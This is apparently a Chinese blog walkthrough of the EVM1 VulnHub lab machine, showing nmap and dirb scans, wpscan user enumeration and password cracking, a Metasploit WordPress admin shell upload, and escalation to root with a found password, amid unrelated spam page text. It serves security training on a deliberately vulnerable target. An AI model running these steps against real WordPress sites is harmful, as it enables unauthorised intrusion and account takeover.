中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Vulhub-EVM1靶機的使用方法

發布時間:2020-06-16 16:16:20 來源:億速云 閱讀:353 作者:元一 欄目:安全技術

一.環境搭建

Vulhub是一個面向大眾的開源漏洞靶場,無需docker知識,簡單執行兩條命令即可編譯、運行一個完整的漏洞靶場鏡像。旨在讓漏洞復現變得更加簡單,讓安全研究者更加專注于漏洞原理本身。

地址

https://www.vulnhub.com/entry/evm-1,391/

下載ova鏡像文件,vbox導入,設置兩張虛擬網卡,分別為NAT模式和僅主機模式(改為默認網卡配置)

ip為192.168.124.156
二.信息搜集:
(端口掃描)

nmap -A 192.168.124.56
Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-16 01:45 EST
Nmap scan report for localhost (192.168.124.56)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA)
|   256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA)
|_  256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519)
53/tcp  open  domain      ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
110/tcp open  pop3?
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: CAPABILITY
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 00:0C:29:C4:5F:AA (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h49m59s, deviation: 2h63m12s, median: 0s
|_nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: ubuntu-extermely-vulnerable-m4ch2ine
|   NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\x00
|   Domain name: \x00
|   FQDN: ubuntu-extermely-vulnerable-m4ch2ine
|_  System time: 2019-12-16T01:48:21-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-12-16 01:48:21
|_  start_date: N/A

(目錄掃描)
開始使用dirb進行目錄掃描dirb http://192.168.124.56/
Vulhub-EVM1靶機的使用方法

從目錄掃描看出他有wordpress所以先試試之前使用過的工具wpscan

wpscan --url http://192.168.124.56/wordpress/ -e u

Vulhub-EVM1靶機的使用方法

成功得到賬號c0rrupt3d_brain,現在繼續破解他的密碼
wpscan --url http://192.168.124.56/wordpress/ -e u -P /chen.txt

Vulhub-EVM1靶機的使用方法

成功破解出密碼24992499

現在開始使用msfconsole 使用模塊

unix/webapp/wp_admin_shell_upload
set RhOSTS 192.168.124.56
set USERNAME c0rrupt3d_brain
set PassWORD 24992499
set targeturi /wordpress
run

Vulhub-EVM1靶機的使用方法

直接進入他的家目錄之后cd root3r 進來之后發現有一個文件似乎是root密碼文件
Vulhub-EVM1靶機的使用方法

現在進行查看發現似乎是密碼,既然已經知道了密碼所以接下來進入交互頁面如下圖:

Vulhub-EVM1靶機的使用方法

shell
python -c "import pty;pty.spawn('/bin/bash')"
su root

密碼輸入為:willy26

Vulhub-EVM1靶機的使用方法

成功拿到root

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

青阳县| 花莲县| 竹山县| 休宁县| 宁化县| 静乐县| 琼结县| 亳州市| 右玉县| 牟定县| 沙湾县| 山丹县| 兰西县| 玉山县| 湖南省| 波密县| 牙克石市| 盈江县| 宿州市| 沂南县| 汉寿县| 文登市| 陆丰市| 无为县| 蕉岭县| 元阳县| 阿瓦提县| 拉萨市| 明光市| 鲜城| 岳池县| 开封市| 恩平市| 安塞县| 成武县| 屏东县| 青浦区| 安宁市| 根河市| 郯城县| 开鲁县|